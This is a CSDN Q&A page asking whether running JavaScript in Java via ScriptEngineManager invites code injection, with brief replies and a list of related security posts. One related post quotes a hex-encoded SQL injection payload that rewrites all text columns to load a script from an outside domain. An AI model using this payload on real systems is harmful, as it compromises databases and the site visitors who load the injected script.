java中运行javascript代码有可能被注入攻击吗? 5C

由于项目需要频繁增加小型服务,且不希望更新整个web服务。在和热更新机制以及脚本引擎的对比选择中,我们使用了ScriptEngineManager在java中运行js脚本。目前的调用机制是web页面发起带有脚本名和方法名的参数请求项目。项目中根据脚本名找到相应的脚本并执行传入的函数名,这里用的是ScriptEngineManager.invokeFunction。现在想请大家来讨论一下这种方式会不会存在被脚本注入的风险!感恩...
补充一点如下:由于业务的关系,不存在脚本和方法的调用权限问题,意思是在脚本外层已经做好了用户和脚本所对应的权限分配。这里的注入是指纯粹的代码注入,如提交js代码之类的参数。请各位前辈帮小弟讨论分析一下!

6个回答

可能 通常都回打包成js'文件 防止注入

不会的,javascript的机制决定了的

肯定能啊,具体去看看官网··········

回,最好对输入的内容做转义处理。

会的。若想防止注入,那获取数据的时候要使用JSTL中的

如果你的 参数只有脚本名和方法名,应该没有注入的分险,后端可以验证一下脚本名和方法名,如果不存在就报错

u011606457
_1_1_7_ 回复jiangkunou: 业务参数也可以做校验 ,有些框架可以配置正则表达式之类的自动校验值域
一年多之前 回复
jiangkunou
jiangkunou 脚本名和方法名是必要参数,用于定位具体执行的js函数, 函数内还会接受各种业务参数呢..... 这个也是我比较担心的一块
一年多之前 回复
Csdn user default icon
上传中...
上传图片
插入图片
抄袭、复制答案,以达到刷声望分或其他目的的行为,在CSDN问答是严格禁止的,一经发现立刻封号。是时候展现真正的技术了!
其他相关推荐
服务器可能被攻击了
我的服务器安全日志里出现的不明的用户名登陆成功的信息,请问各为高手如何查看是从那里进入的,如何防范。
JavaScript 注入攻击
方法 1:视图中的 HTML 编码   阻止 JavaScript 注入攻击的一种简单方法是重新在视图中显示数据时,用 HTML 编码任何网站用户输入的数据 如: 使用 HTML 编码一个字符串的含意是什么呢?使用 HTML 编码字符串时,危险字符如 和 > 被替换为 HTML 实体,如 < 和 >。所以,当使用 HTML 编码字符串 alert(“Boo!”)
这样的HQL有可能被sql注入吗??
this.getHibernateTemplate().find("form Page p where p.father = '"+"'"+page.getId());rn用的是spring 的HibernateDaoSupport类
HTML5-App的代码注入攻击
HTML5-App的代码注入攻击,移动APP安全开发参考
网站80端口可能被攻击
开启IIS网站后 流量立马上升百分之50以上 system程序占用宽带rnrn把网站改成其他端口网络就正常了 怎么解决啊
mssql被注入攻击了,求解
rnrnmssql被注入攻击了。在我的数据库很多重要的表里面,部分字段后面都跟上了一段一样的代码 ,谢谢各rnrn位给段代码我把他给替换掉把,愁死了,先解决问题,然后在说方法防范。rn
注入攻击-SQL注入和代码注入
注入攻击代指一类攻击,它们通过注入数据到一个网络应用程序以期获得执行,亦或是通过非预期的一个方式来执行恶意数据。这种类别的攻击包括跨站脚本攻击(XSS)、SQL 注入攻击、头部注入攻击、日志注入攻击和全路径暴露。当然限于篇幅,这里只是一个简单的介绍。
这样的源代码有注入的可能吗
sql = "select Id,title from Texts where Title like '%0%'";rn sql = string.Format(sql, keyword.Replace("'", "")); //<-- 把'都过滤掉rnDataTable dt = DB.GetTable(sql);rnrn也就是说,在执行sql之前把'都过滤掉了,本身在一个like '% 0 %'里
终端注入攻击代码的含义
DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E73383030716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E73383030716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); 503 1066425765 Disabledrnrn哪位给解一下?
SQL注入攻击演示代码
数据库截图: package TestJDBC;import java.sql.Connection; import java.sql.DriverManager; import java.sql.ResultSet; import java.sql.Statement;/** * sql注入攻击的演示代码 * @author Administrator * */ public class
注入攻击--SQL注入
注入攻击的本质是把用户输入的数据当做代码执行。这里有两个关键条件:   1)用户能够控制输入   2)原本程序要执行的代码,拼接了用户输入的数据 SQL注入的典型例子 var ShipCity; ShipCity = Request.form("ShipCity"); var sql = "select * from OrdersTable where ShipCity='"+Sh
注入攻击之sql注入
在1998年,一位名为rfp的黑客发表了一篇题为“NT Web Technology Vulnerabilities”的文章 注入攻击的两个条件: (1).用户能够克制数据的输入--在这里,用户能够控制变量; (2).原本要执行的代码,凭借了用户的输入; 一般输入一个‘单引号就能引起执行查询语句的语法错误,有些服务器会直接返回错误回显,有些服务器则不返回任何
神经网络的迭代次数有可能被计算出来吗?
制作一个网络   这个网络由两部分组成左边的 S(11)*11*11-7*7*s(7)  右边的是 S(0.1)*11*11-7*7*s(7) 让左右两个网络里的上下两个网络相互之间同时向对方收敛 同时让s(11)*11*11和s(0.1)*11*11的网络的第一二三层权重同步相等,实现权重共享。 这个结果就相当于让11学习一个7*7*s(7)的网络,让0.1也学习一个7*7*...
神经网络有可能被公式化表达吗?
&amp;lt;用实验验证神经网络的节点是否可以看作弹性小球&amp;gt;中制作了一个1*1...1(共64个)的64层神经网络for(inta=2 ;a&amp;lt;r-2 ;a++){           d=x[a][0]*(x[a+1][0]-x[a+2][0])+x[a][0]*( x[a-1][0]-x[a-2][0]);}并让权重同时向前和向后收敛(首尾另做处理)得到的图像非常像水波本文就由sigmoi...
31、你了解Java应用开发中的注入攻击吗?
安全是软件开发领域永远的主题之一,随着新技术浪潮的兴起,安全的重要性愈发凸显出来,对于金融等行业,甚至可以说安全是企业的生命线。不论是移动设备、普通 PC、小型机,还是大规模分布式系统,以及各种主流操作系统,Java 作为软件开发的基础平台之一,可以说是无处不在,自然也就成为安全攻击的首要目标之一。 今天我要问你的问题是,你了解 Java 应用开发中的注入攻击吗? 典型回答 注入式(Inje...
网页被注入代码
网页上被注入了 代码rn请教高手如何解决
注入攻击
定义:将用户输入的数据当做代码执行。 两个关键条件:     1. 用户能够控制输入;     2. 原本程序要执行的代码拼接了用户输入的数据; 常用的注入方式:     1. SQL注入攻击     2. CMD注入攻击     3. XML注入攻击     4. 代码注入攻击     5. CRLF注入攻击
===============请问各位高手,这样能被sql注入攻击吗?==================
sql="select title,id,UpdateTime from files"rnsql=sql &" where contains(Content,'"&title& "') and checked=1" rn用的是全文检索,title是输入的关键字,请问各位高手,这样能被sql注入攻击吗?
数据库注入攻击和防止注入攻击
Java程序实现用户登录,用户名和密码,数据库检查  演示被别人注入攻击 public class userdenglu { public static void main(String[] args) throws ClassNotFoundException, SQLException { //密码和用户名写死的情况下的注入攻击 //用户名和密码由用户输入 Class.fo
java防止xss注入攻击
后面附录有三个.java文档 1.把文档拷进项目中(最好建立一个单独的包存放),然后修改引入路径,看到不报错那么第一步完成。 2.打开web.xml配置文件 xssFilter cn.parent.xss.XssFilter xssFilter /* 测试: 在输入框输入 cript>alert('aa') 点击提交或
被注入攻击了,怎么解决啊?
每个表都被注入了一段js代码,数据库完蛋了rn咋办啊???
服务器频繁遭攻击,被sql注入
这两天,公司服务器一直遭受网络垃圾的恶意攻击rn就好像跟我玩猫捉老鼠的游戏似的。rn我一恢复好,他马上又开始攻击,我都火大了,真想找出来拿刀剁死他.rn我也查看了IIS日志文件,但是好像没有什么痕迹发现!rn因为公司的网站是放在IDC机房托管,服务器也在外网上,没办法,数据库很容易遭暴!rn但是我在网页程序上也作了些过滤,而且也按照网上大家普通的解决方法放了一些防注入的文件在程序顶部!rn但似乎这一切都无济于事!rn真的快没招了rn只好向各位大侠们请教几招!rn还有,为什么我的IIS日志文件中的时间(2009-03-06 00:06:07)总是比实际时间要晚几个小时??不明白!
sql 注入的问题,急,网站被攻击了!
asp.net(c#)有没有个整站的防止sql注入的办法呀,或者类之类的。现在网站被攻击了。如果一个个页面去修改的话,工作量太大了呀!
MySQL-演示如何被别人注入攻击
这是其中一种方式  package demo; import java.sql.Connection; import java.sql.DriverManager; import java.sql.ResultSet; import java.sql.SQLException; import java.sql.Statement; import java.util.Scanner; /* ...
asp页面被攻击,注入代码,怎么办,求救.....
朋友的一个asp网站被人攻击,打开这个网站后,每一页的状态栏都会显示另外一个网站的域名。点右键查看源文件可以看到这样一段代码rn rn但是找遍了源程序,也没有找到这段代码写在什么地方,该如何去除这段代码呢,请高手指点,不胜感激,谢谢。
JDBC中SQL注入与注入攻击原理
最近在学jdbc的数据库连接 里面讲到sql注入,没明白,后来搜wiki,解释真的是十分清楚。 作用原理[编辑] SQL命令可查询、插入、更新、删除等,命令的串接。而以分号字符为不同命令的区别。(原本的作用是用于SubQuery或作为查询、插入、更新、删除……等的条件式)SQL命令对于传入的字符串参数是用单引号字符所包起来。(但连续2个单引号字符,在SQL数据库中,则视为字符串中的一
有可能同时运行多个JAVA application程序吗?
本人已经做好几个处理图像的java application程序,比如一个java application是人工把清晰图像变模糊,另一个是通过运算恢复原图像,都运用swing展现出来,运行后可以调节一些变量看到图像改变时的效果。rnrn问题一:这两个java application 可以同时运行吗?rnrn问题二:如何将结果更好的展现出来?目的是要让任何人都可以方便的运行使用它们,自行打开一张图片,或从一些已设定的图片中选一张,进行处理,并看到结果。rnrn请各位达人帮帮忙,出出主意。小妹不胜感激。
如何防止网站被SQL注入攻击之java网站安全防护
SQL注入攻击(SQL injection)是目前网站安全以及服务器安全层面上是最具有攻击性,危害性较高,被黑客利用最多的一个漏洞,基本上针对于网站代码,包括JAVA JSP PHP ASP apache tomcat 语言开发的代码都会存在sql注入漏洞。 随着JAVA JSP架构的市场份额越来越多,许多平台都使用JAVA开发,本文通过对sql注入的详细分析,从代码层面以及服务器层面,根本上来防...
在ASP.NET中防止注入攻击
在ASP.NET中防止注入攻击
问下这样做是否有可能被注入怎么防
我页面用这样的方法接受来路地址 rn rnrnurl.php里面直接用的 $url=$_GET["url"];来接受来访域名信息rnrn这样是否有安全漏洞 怎么去弥补漏洞 麻烦各位给写个正则或其他办法吧
小解html转义防止javascript注入攻击
萌新在练习留言板时发现在输入框中写一段js脚本,例如,不但有效的避免了javascript注入攻击,又反映出用户的真实输出。 我们可以利用jquery来解决 /*对html标签进行转义*/ function htmlEncode ( str ) { //str为输入值 return $('&amp;amp;amp;lt;span/&amp;amp;amp;gt;').text( str ).html(); } /*对html标签进...
解决html转义及防止javascript注入攻击
第一种:value="${wcrActivity.activityTitle.replace(//g,'&gt;').replace(/"/g,'&quot;');}"                    第二种:value="${wcrPlatformSet.platformName.replace('\"','&quot;')}"  第三种:后台获取该字段的时候使用request.get
浅谈html转义及防止javascript注入攻击
有的时候页面中会有一个输入框,用户输入内容后会显示在页面中,类似于网页聊天应用。如果用户输入了一段js脚本,比例:alert('test');,页面会弹出一个对话框,或者输入的脚本中有改变页面js变量的代码则会时程序异常或者达到跳过某种验证的目的。那如何防止这种恶意的js脚本攻击呢?通过html转义能解决这个问题。 一:什么是html转义? html转义是将特殊字符或html标
下面的代码有可能用到sqlserver吗?
这个是web.config中的session设置rn rnrn下面是具体的asp.net页面rnrnrn rn prodlsucrn rn rn rn rn rn rn rn rn rn rn rn rn rnrnrn里面的session的使用方式在web.config中是写用"inproc"模式的, 请问这样会使用到数据库吗?
服务器可能遭到伪造IP的攻击吗?
如果这个IP是伪造的,那么服务器的回应,应该是发给这个伪造的IP.rn攻击者收不到回应,也无法发送攻击数据.rnrn但如果这个伪造的IP找不到,服务器是不是会等待.rn如果有大量伪造的IP连接过来,服务器处理这些伪造的IP去了,就无法处理正常的连接要求了.rnrnTCP堆栈大小是多少?rn这个如何防止?
真的有可能吗?
rnrn[b] [size=14px] 前几天听说 MSSQL 的数据库不用附加到 MSSQL DBMS 中,应用程序就可以连接并能正常使用!rnrn自己一听,感觉不可思议,但凭着自己在学校学习的这点知识,还是不敢肯定,想问一下大家,是否可以?rnrn如果真的可以的话,那是什么技术?[/[/size]b]
有这样的可能吗?
在一个表里,显示的新闻条数为十,也就是说表格大小不能变,如果新闻标题过长,就转行就,但是那样就让表格里显示九条,如果有两条新闻题目过长,就让表里显示八条,依次类推,反正最终表里只有十行.至于显示几条标题就不一定了,不知我说明白没有?这样能实现吗?
asp.net +access 还用堤防 注入攻击吗?
asp.net +access 还用堤防 注入攻击吗?rn我听过一个老师的课说 注入攻击基本上都是针对asp的。.net可以不用考虑。
有可能吗?
光盘上能否运行asp或者php、jsp或者其它的网页程序(访问数据库)?要求是不在客户机上安装,直接运行。rn好像有点异想天开,:(
DNS攻击代码编写者被自己代码攻击
DNS攻击代码编写者被自己代码攻击DNS攻击代码编写者被自己代码攻击
相关热词 c#入门推荐书 c# 解码海康数据流 c# xml的遍历循环 c# 取 查看源码没有的 c#解决高并发 委托 c#日期转化为字符串 c# 显示问号 c# 字典对象池 c#5.0 安装程序 c# 分页算法